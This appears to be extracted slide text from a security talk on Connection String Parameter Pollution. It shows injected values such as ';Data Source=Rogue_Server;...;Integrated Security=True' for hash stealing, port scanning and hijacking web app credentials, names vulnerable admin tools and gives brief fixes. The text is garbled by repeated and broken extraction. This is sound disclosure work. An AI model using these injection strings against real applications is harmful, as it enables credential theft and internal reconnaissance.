Академический Документы
Профессиональный Документы
Культура Документы
Chema Alonso
Informática 64
Connection Strings
• Define
Define the
the way an application connects to
data repository
• There are connection
are connection strings for:
– Relational Databases (MSSQL, Oracle, MySQL,…)
– LDAP Directories
LDAP Di i
– Files
– Etc…
Databases Connection Strings
Data Source
Data Source = myServerAddress;
= myServerAddress;
Initial Catalog = myDataBase;
myDataBase;
User Id = myUsername;
Password = myPassword;
Google Hacking
Google Hacking
Google Hacking
Google Hacking
UDL (Universal Data Links) Files
UDL (Universal Data Links) Files
Credentials
Operating System Accounts Database Credentials
Data Source = Data Source =
myServerAddress; myServerAddress;
Initial Catalog = myDataBase; Initial Catalog = myDataBase;
User Id = myUsername; User Id = myUsername;
Password = myPassword; Password = myPassword;
Integrated Security = Integrated Security = No;
SSPI/True/Yes;
Users autheticated by Web App
Web application manages the login process
1.‐ Web applicaton
connects using its
Syslogins Connection string credentials to the
database.
2.‐ A connection
2 i string
i
is composed with the
Syslogins Connection string credentials to connect
to the database.
3.‐ Roles and permits
are limited by the user
used
sed in the
in the connection
string
Data Source = myServerAddress;
I iti l Catalog
Initial C t l = myDataBase;
D t B
Integrated Security = NO;
User Id = myUsername;
Password = myPassword; Encryption = Off;
ConnectionStringBuiler
• Available in .NET Framework 2.0
• Build secure connection strings using parameters
• It´s not possible to inject into the connection string
Are people aware of this?
Are people of this?
Connection String Parameter Pollution
• The goal is to inject parameters in the connection
e goa s to ject pa a ete s t e co ect o
string, whether they exist or not
• Had duplicated a parameter, the last value wins
• This behavior allows attackers to re‐write
completly the connection string, therefore to
manipulate the way the appliation will work and
how should be the it authenticated
Pollutionable Behavior
Param1=Value A Param2=Value B Param1=Value C Param2=Value D
DBConnection Object
Param1
Param2
What can be done with CSPP?
Rewrite a parameter
Data Source=DB1
Data Source=DB1 UID=sa password=Pwnd! Data Source=DB2
Data Source=DB2
DBConnection Object
DataSource
UID
password
Scanning the DMZ
Data
Web app Source
I t
Internet
t Production
FW vulnerable
to CSPP Database
Port Scanning a Server
Port Scanning a Server
DataSource
DB1,80
DB1,21
Web app DB1,25
Internet vulnerable Production
FW to CSPP Database
DB1 1445
DB1,1445
Server
What can be done with CSPP?
Add a parameter
dd
Data Source=DB1
Data Source=DB1 UID=sa password=Pwnd! Integrated Security=True
DBConnection Object
DataSource
UID
password
CSPP Attack 1: Hash stealing
CSPP Attack 1: Hash stealing
1 ‐ Run a Rogue
1. a Rogue Server on
Server on an accessibl IP address:
IP address:
Rogue_Server
2 Activate a sniffer
2.‐ a sniffer to catch the
catch the login process
Cain/Wireshark
3.‐ Duplicate Data Source parameter
Data_Source=Rogue_Server
4.‐ Force Windows Integrated Authentication
Integrated
g Security=true
y
CSPP Attack 1: Robo de Hash
CSPP Attack 1: Robo de Hash
Data source
Data source = SQL2005; initial catalog
SQL2005; initial catalog = db1;
db1;
Integrated Security=no; user id=+’User_Value’+;
Password=+’Password
Password=+ Password_Value
Value’+;+;
Data source = SQL2005; initial catalog = db1;
D t SQL2005 i iti l t l db1
Integrated Security=no; user id= ;Data
S
Source=Rogue_Server;
R S
Password=;Integrated Security=True;
CSSP 1:ASP.NET Enterprise Manager
CSSP 1:ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning
CSPP Attack 2: Port Scanning
1 ‐ Duplicate the Data Source
1. Data Source parameter setting
on it the Target server and target port to be
scanned.
scanned
Data_Source=Target_Server,target_Port
2 Check the error messages:
2.‐ error messages:
‐ No TCP Connection ‐> Port is opened
‐ No SQL Server ‐> Port is closed
‐ SQL Server ‐> Invalid Password
CSPP Attack 2: Port Scanning
CSPP Attack 2: Port Scanning
Data source
Data source = SQL2005; initial catalog
SQL2005; initial catalog = db1;
db1;
Integrated Security=no; user id=+’User_Value’+;
Password=+’Password
Password=+ Password_Value
Value’+;+;
Data source = SQL2005; initial catalog = db1;
D t SQL2005 i iti l t l db1
Integrated Security=no; user id= ;Data
S
Source=Target_Server, Target_Port;
T t S T t P t
Password=;Integrated Security=True;
CSPP 2: myLittleAdmin
CSPP 2: myLittleAdmin
Port is Opened
Port is Opened
CSPP 2: myLittleAdmin
CSPP 2: myLittleAdmin
Port is Closed
Port is
CSPP Attack 3: Hijacking
CSPP Attack 3: Hijacking Web Credentials
Web Credentials
1 ‐ Duplicate Data Source
1. Data Source parameter to the
target SQL Server
Data Source=Target Server
Data_Source=Target_Server
2.‐ Force Windows Authentication
Integrated Security=true
3.‐ Application
pp pool in which the web app
p pp is
running on will send its credentials in order to
log in to
g the database engine.
g
CSPP Attack 3: Hijacking
CSPP Attack 3: Hijacking Web Credentials
Web Credentials
Data source
Data source = SQL2005; initial catalog
SQL2005; initial catalog = db1;
db1;
Integrated Security=no; user id=+’User_Value’+;
Password=+’Password
Password=+ Password_Value
Value’+;+;
Data source = SQL2005; initial catalog = db1;
D t SQL2005 i iti l t l db1
Integrated Security=no; user id= ;Data
S
Source=Target_Server;
T t S
Password=;Integrated Security=true;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3: Web Data Administrator
CSPP Attack 3:
myLittleAdmin/myLittleBackup
l d / l k
CSPP Attack 3: ASP.NET Enterprise Manager
CSPP Attack 3: ASP.NET Enterprise Manager
Other Databases
• MySQL
– Does not support Integrated security
– It´s possible to manipulate the behavior of the web application,
although
• Port Scanning
• Connect to internal/testing/for developing Databases
• Oracle supports integrated authority running on Windows
and UNIX/Linux servers
d UNIX/Li
– It´s possible to perform all described attacks
• Hash stealing
• Port Scanning
P tS i
• Hijacking Web credentials
– Also it´s possible to elevate a connection to sysdba in order to
shutdown/startup an instance
shutdown/startup an instance
myLittleAdmin/myLittleBackup
• Fix the code yourself
Fix the code yourself
ASP.NET Enterprise Manager
ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is “abandoned”, but it´s
been used in a lot of web Control Panels
been used in a lot of web Control Panels.
• Fix the code yourself
h lf
ASP.NET Web Data Admistrator
ASP.NET Web Data Admistrator
• Filter the ;)
Questions?
Contacto
Chema Alonso
chema@informatica64.com
http://www.informatica64.com
http://elladodelmal.blogspot.com
Palako
palakko@lateatral.com
Authors
Chema Alonso
Manuel Fernández “The Sur”
Alejandro Martín Bailón
Antonio Guzmán